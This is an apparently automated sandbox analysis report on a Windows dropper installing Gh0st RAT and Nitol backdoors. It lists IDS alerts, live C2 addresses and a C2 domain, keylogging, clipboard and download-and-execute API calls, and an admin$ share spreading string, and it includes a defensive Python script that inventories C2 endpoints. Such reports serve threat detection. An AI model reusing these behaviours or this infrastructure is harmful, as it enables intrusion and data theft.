2024-12-23T09:13:17.322358+0100 | 2013214 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49717 | 120.48.34.233 | 8000 | TCP
2024-12-23T09:13:18.814318+0100 | 2048478 | 1 | A Network Trojan was detected | 120.48.34.233 | 8000 | 192.168.2.9 | 49717 | TCP
2024-12-23T09:13:18.363697+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49723 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:13:37.071523+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49761 | 93.46.8.90 | 8090 | TCP
2024-12-23T09:13:41.286544+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49770 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:14:03.725639+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49816 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:14:19.283148+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49841 | 93.46.8.90 | 8090 | TCP
2024-12-23T09:14:26.436544+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49863 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:14:48.925491+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49902 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:15:01.201380+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49928 | 93.46.8.90 | 8090 | TCP
2024-12-23T09:15:19.384989+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49944 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:15:34.537181+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49985 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:15:41.766783+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49986 | 93.46.8.90 | 8090 | TCP
2024-12-23T09:15:56.678352+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49987 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:16:19.335820+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49988 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:16:36.233553+0100 | 2025135 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49989 | 46.82.174.69 | 8090 | TCP
2024-12-23T09:13:18.814318+0100 | 2808814 | 1 | Malware Command and Control Activity Detected | 120.48.34.233 | 8000 | 192.168.2.9 | 49717 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49902 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49841 | 93.46.8.90 | 8090 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49863 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49989 | 46.82.174.69 | 8090 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49986 | 93.46.8.90 | 8090 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49985 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49988 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49928 | 93.46.8.90 | 8090 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49987 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49723 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49770 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49761 | 93.46.8.90 | 8090 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49944 | 120.48.34.233 | 8080 | TCP
2024-12-23T09:13:10.187285+0100 | 2807550 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49816 | 120.48.34.233 | 8080 | TCP

AV Detection

Source: G3izWAY3Fa.exe | Avira: detected
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe | Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\Temp\server.exe | Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\Temp\v5.exe | Avira: detection malicious, Label: TR/Staser.apzjs
Source: C:\Windows\Temp\server.exe | ReversingLabs: Detection: 95%
Source: C:\Windows\Temp\v5.exe | ReversingLabs: Detection: 100%
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe | ReversingLabs: Detection: 95%
Source: G3izWAY3Fa.exe | ReversingLabs: Detection: 86%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.8% probability
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe | Joe Sandbox ML: detected
Source: C:\Windows\Temp\server.exe | Joe Sandbox ML: detected
Source: C:\Windows\Temp\v5.exe | Joe Sandbox ML: detected
Source: G3izWAY3Fa.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbg source: .exe, 00000005.00000002.3268806421.0000000003EE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb$ source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1384775691.000000000307F000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000000.1380991211.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
              Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.3268703284.000000000282E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp

              Spreading

Source: C:\Windows\Temp\v5.exe | Code function: 4_2_00402AD0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,lstrcmp,sprintf,sprintf,sprintf,WNetAddConnection2A,Sleep,memset,sprintf,CopyFileA,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,GetLocalTime,memset,sprintf,WinExec,Sleep | string: \\%s\admin$\g1fd.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code function: 0_2_0040263E FindFirstFileA
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code function: 0_2_00405CD8 FindFirstFileA,FindClose
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA
Source: C:\Windows\Temp\server.exe | Code function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose
Source: C:\Windows\Temp\server.exe | Code function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle
Source: C:\Windows\Temp\ .exe | Code function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA
Source: C:\Windows\Temp\ .exe | Code function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Windows\Temp\ .exe | Code function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA
Source: C:\Windows\Temp\server.exe | Code function: 3_2_1000AA30 wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,wsprintfA,GetTickCount,wsprintfA,GetComputerNameA,GetUserNameA,wsprintfA,GetLogicalDriveStringsA,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,lstrlen,wsprintfA,wsprintfA,GlobalMemoryStatusEx,GlobalMemoryStatusEx,wsprintfA,GlobalMemoryStatusEx,wsprintfA,wsprintfA,lstrlen,wsprintfA,_strrev,_strrev,_strrev,_strrev,wsprintfA,wsprintfA
Source: C:\Windows\Temp\ .exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Windows\Temp\ .exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\Temp\ .exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini
Source: C:\Windows\Temp\ .exe | File opened: C:\Users\user\AppData
Source: C:\Windows\Temp\ .exe | File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Windows\Temp\ .exe | File opened: C:\Users\user

              Networking

Source: Network traffic | Suricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.9:49717 -> 120.48.34.233:8000
Source: Network traffic | Suricata IDS: 2016922 - Severity 1 - ET MALWARE Backdoor family PCRat/Gh0st CnC traffic : 192.168.2.9:49717 -> 120.48.34.233:8000
Source: Network traffic | Suricata IDS: 2048478 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Gh0stRat Keep-Alive : 120.48.34.233:8000 -> 192.168.2.9:49717
Source: Network traffic | Suricata IDS: 2808814 - Severity 1 - ETPRO MALWARE Backdoor family PCRat/Gh0st CnC Response : 120.48.34.233:8000 -> 192.168.2.9:49717
Source: Network traffic | Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin, and Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3, both fired on the same 14 check-in flows:
    192.168.2.9:49723 -> 120.48.34.233:8080
    192.168.2.9:49761 -> 93.46.8.90:8090
    192.168.2.9:49770 -> 120.48.34.233:8080
    192.168.2.9:49816 -> 120.48.34.233:8080
    192.168.2.9:49841 -> 93.46.8.90:8090
    192.168.2.9:49863 -> 120.48.34.233:8080
    192.168.2.9:49902 -> 120.48.34.233:8080
    192.168.2.9:49928 -> 93.46.8.90:8090
    192.168.2.9:49944 -> 120.48.34.233:8080
    192.168.2.9:49985 -> 120.48.34.233:8080
    192.168.2.9:49986 -> 93.46.8.90:8090
    192.168.2.9:49987 -> 120.48.34.233:8080
    192.168.2.9:49988 -> 120.48.34.233:8080
    192.168.2.9:49989 -> 46.82.174.69:8090
Source: C:\Windows\Temp\server.exe | Code function: 3_2_1000B6F0 Sleep,wsprintfA,GetTickCount,GetTickCount,wsprintfA,URLDownloadToFileA,GetTempPathA,fopen,fscanf,fscanf,GetTickCount,wsprintfA,GetTickCount,wsprintfA,URLDownloadToFileA,ShellExecuteA,fscanf,fclose,DeleteFileA,Sleep
Source: global traffic | TCP traffic: 192.168.2.9:49717 -> 120.48.34.233:8000
Source: global traffic | TCP traffic: 192.168.2.9:49761 -> 93.46.8.90:8090
Source: Joe Sandbox View | ASN Name: CHINANET-BACKBONENo31Jin-rongStreetCN
Source: Joe Sandbox View | ASN Name: FASTWEBIT
Source: unknown | TCP traffic detected without corresponding DNS query: 120.48.34.233 (reported 48 times)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 2 times)
Source: C:\Windows\Temp\v5.exe | Code function: 2_2_004036C6 select,__WSAFDIsSet,recv
Source: global traffic | DNS traffic detected: DNS query: chinagov.8800.org
Source: v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.168.2.1
Source: v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.168.2.1/
Source: v5.exe, 00000004.00000002.3331561423.0000000000768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.168.2.1/&
Source: G3izWAY3Fa.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: G3izWAY3Fa.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: .exe, 00000005.00000002.3268535550.000000000224B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: .exe, 00000005.00000002.3255175197.000000000089B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: .exe, 00000005.00000002.3255175197.0000000000844000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033l
Source: .exe, 00000005.00000002.3255175197.0000000000844000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033taiLMEM
Source: .exe, 00000005.00000002.3268806421.0000000003EE4000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.3255175197.000000000089B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: .exe, 00000005.00000002.3255175197.0000000000852000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=6c2de995c290b031854b
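The Suricata alert table at the top of this report and the Networking findings above carry the same information in two shapes: rule hits per flow, and flows that reached an address no DNS answer ever returned (the sample's only query was chinagov.8800.org, yet every C2 session went to a literal IP). The script below, an added example written for this page rather than anything from Joe Sandbox or the sample, parses alert lines in the report's own format into a de-duplicated C2 inventory and reproduces the "TCP traffic without corresponding DNS query" check by correlating flows against observed DNS answers. The alert lines are copied from the report; the DNS answer address for chinagov.8800.org is a constructed placeholder, since the report does not state what it resolved to.

```python
"""Added example (not part of the Joe Sandbox report): turn Suricata alert
lines from the report into a C2 endpoint inventory, and flag connections to
addresses that no observed DNS answer carried (hard-coded C2)."""
import re
from collections import defaultdict

# Alert lines copied verbatim from the report's Networking section.
ALERTS = """\
Suricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.9:49717 -> 120.48.34.233:8000
Suricata IDS: 2048478 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Gh0stRat Keep-Alive : 120.48.34.233:8000 -> 192.168.2.9:49717
Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49723 -> 120.48.34.233:8080
Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49761 -> 93.46.8.90:8090
Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49989 -> 46.82.174.69:8090
"""

ALERT_RE = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d) - (?P<msg>.+?) : "
    r"(?P<sip>[\d.]+):(?P<sport>\d+) -> (?P<dip>[\d.]+):(?P<dport>\d+)$"
)

# The analysis VM sits in this subnet (192.168.2.9 in the report).
SANDBOX_NET = "192.168.2."

# DNS answers seen in the capture.  The report shows one query only
# (chinagov.8800.org); 203.0.113.10 is a constructed placeholder answer.
DNS_ANSWERS = {"chinagov.8800.org": {"203.0.113.10"}}


def parse_alerts(text):
    """Parse alert lines; normalise each to the remote (non-sandbox) endpoint
    so that a check-in and the server's reply land on the same key."""
    out = []
    for line in text.splitlines():
        m = ALERT_RE.search(line)
        if not m:
            continue  # not an alert line (heading, blank, other finding)
        d = m.groupdict()
        if d["sip"].startswith(SANDBOX_NET):
            remote, direction = (d["dip"], int(d["dport"])), "out"
        else:
            remote, direction = (d["sip"], int(d["sport"])), "in"
        out.append({"sid": int(d["sid"]), "severity": int(d["sev"]),
                    "msg": d["msg"], "remote": remote, "direction": direction})
    return out


def c2_inventory(alerts):
    """Map 'ip:port' -> sorted list of rule SIDs that fired on that endpoint."""
    inv = defaultdict(set)
    for a in alerts:
        inv[a["remote"]].add(a["sid"])
    return {f"{ip}:{port}": sorted(sids) for (ip, port), sids in sorted(inv.items())}


def hardcoded_ip_connections(flows, dns_answers, resolver_port=53):
    """Remote IPs contacted although no observed DNS answer carried them.
    `flows` is an iterable of (ip, port).  Traffic to the resolver itself
    (port 53) is skipped so the DNS query is not reported as its own anomaly."""
    resolved = set()
    for addrs in dns_answers.values():
        resolved |= set(addrs)
    return sorted({ip for ip, port in flows
                   if port != resolver_port and ip not in resolved})


if __name__ == "__main__":
    parsed = parse_alerts(ALERTS)
    for endpoint, sids in c2_inventory(parsed).items():
        print(endpoint, sids)
    flows = [a["remote"] for a in parsed] + [("1.1.1.1", 53)]
    print("hard-coded C2 addresses:", hardcoded_ip_connections(flows, DNS_ANSWERS))
```

On the report's own data this yields one inventory entry per C2 socket (120.48.34.233 on 8000 for the Gh0st session and on 8080 for Nitol, plus 93.46.8.90:8090 and 46.82.174.69:8090) and lists all three addresses as hard-coded, which is exactly what the 48 "without corresponding DNS query" findings say in aggregate. Feeding the same functions a full Suricata eve.json export rather than the copied lines only requires swapping the regex for the JSON fields (`alert.signature_id`, `src_ip`, `dest_port`).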

              Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Temp\server.exe | Code function: 3_2_10009A00 (string: <BackSpace>)
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10009A00 (string: <Enter>)
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code function: 0_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Windows\Temp\server.exe | Code function: 3_2_1000FA20 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard
Source: C:\Windows\Temp\server.exe | Code function: 3_2_1000FA90 OpenClipboard,GetClipboardData,CloseClipboard,GlobalSize,GlobalLock,??2@YAPAXI@Z,GlobalUnlock,CloseClipboard,??3@YAXPAX@Z
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10009A00 GetKeyState,Sleep,lstrlen,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcat,lstrlen,lstrcat,lstrcat
Source: C:\Windows\Temp\ .exe | Code function: 5_2_00457B94 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA

              E-Banking Fraud

Source: C:\Windows\Temp\server.exe | Code function: 3_2_1000A6B0 RegOpenKeyExA,RegQueryValueA,RegCloseKey,Sleep,lstrlen,strstr,lstrcpy,CreateProcessA | string: Applications\iexplore.exe\shell\open\command
Source: conhost.exe | Process created: 51
Source: cmd.exe | Process created: 96

              System Summary

Source: dump.pcap, type: PCAP | Matched rule: gh0st Author: https://github.com/jackcr/
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects a ZxShell related sample from a CN threat group Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Nitol Malware Author: Florian Roth
Source: 00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: gh0st Author: https://github.com/jackcr/
Source: 00000003.00000002.3363429748.0000000002A7D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY | Matched rule: gh0st Author: https://github.com/jackcr/
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10002800 NtdllDefWindowProc_A
Source: C:\Windows\Temp\ .exe | Code function: 5_2_0042E150 DeviceIoControl
Source: C:\Windows\Temp\v5.exe | Code function: 2_2_0040351A OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Windows\Temp\server.exe | Code function: 3_2_10012010 ExitWindowsEx
Source: C:\Windows\Temp\server.exe | Code function: 3_2_1000B0F0 _strrev,_strrev,_strrev,GetVersionExA,ExitWindowsEx
Source: C:\Windows\Temp\ .exe | Code function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx
Source: C:\Windows\Temp\ .exe | Code function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx
Source: C:\Windows\Temp\ .exe | Code function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx
Source: C:\Windows\Temp\server.exe | File created: C:\Windows\XXXXXX05CA35CC
Source: C:\Windows\Temp\server.exe | File created: C:\Windows\XXXXXX05CA35CC\svchsot.exe
Source: C:\Windows\Temp\server.exe | File created: C:\Windows\SysWOW64\05CA35CC
Source: C:\Windows\SysWOW64\cmd.exe | File deleted: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP8C35.tmp
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code functions: 0_2_004046CA, 0_2_00405FA8
Source: C:\Windows\Temp\v5.exe | Code function: 2_2_00407470
Source: C:\Windows\Temp\server.exe | Code functions:
    3_2_004023C9, 3_2_10037810, 3_2_10052816, 3_2_1005401A, 3_2_10044020, 3_2_10051029, 3_2_10043030, 3_2_10037040,
    3_2_10041850, 3_2_1002F060, 3_2_1001D080, 3_2_10036080, 3_2_1002C090, 3_2_10045090, 3_2_1002C8A0, 3_2_1002F8B0,
    3_2_100380B0, 3_2_100348C0, 3_2_100388C0, 3_2_1003F0C0, 3_2_100678C0, 3_2_100350E0, 3_2_100398F0, 3_2_100518F1,
    3_2_10035900, 3_2_10040940, 3_2_10042170, 3_2_1001C990, 3_2_1002E9A0, 3_2_100321B0, 3_2_100369B0, 3_2_100229C0,
    3_2_100289C0, 3_2_1004C1D0, 3_2_100579D0, 3_2_10030200, 3_2_10034200, 3_2_10042A00, 3_2_10041220, 3_2_10017A30,
    3_2_1003CA30, 3_2_10043A30, 3_2_10031A40, 3_2_1001DA50, 3_2_10040A50, 3_2_10018A70, 3_2_10014A70, 3_2_1003EA80,
    3_2_10054ABB, 3_2_100312D0, 3_2_1003A2D0, 3_2_1002E2E0, 3_2_10032AE0, 3_2_1001E2F0, 3_2_100682F0, 3_2_10037B10,
    3_2_1003C310, 3_2_1003BB20, 3_2_1004A320, 3_2_10041B20, 3_2_10030B40, 3_2_1004F34F, 3_2_1002C350, 3_2_10017360,
    3_2_10038360, 3_2_1001D370, 3_2_1003D390, 3_2_1001ABA0, 3_2_100393A0, 3_2_100563A0, 3_2_1004FBC5, 3_2_1004B3C0,
    3_2_100233F0, 3_2_1003DBF0, 3_2_100413F0, 3_2_10053418, 3_2_1005141B, 3_2_10042420, 3_2_1001543E, 3_2_10040C40,
    3_2_10034C70, 3_2_1001C480, 3_2_1001ACA0, 3_2_100364B0, 3_2_1002DCC0, 3_2_10035CC0, 3_2_100554E0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100334F03_2_100334F0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100544FD3_2_100544FD
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003AD003_2_1003AD00
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10015D103_2_10015D10
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001CD203_2_1001CD20
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100355403_2_10035540
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003FD403_2_1003FD40
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100345603_2_10034560
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1002C5703_2_1002C570
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10051DC73_2_10051DC7
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003CDC03_2_1003CDC0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100415C03_2_100415C0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100145D03_2_100145D0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1004A5D03_2_1004A5D0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10016DE03_2_10016DE0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10039DE03_2_10039DE0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1004CDE03_2_1004CDE0
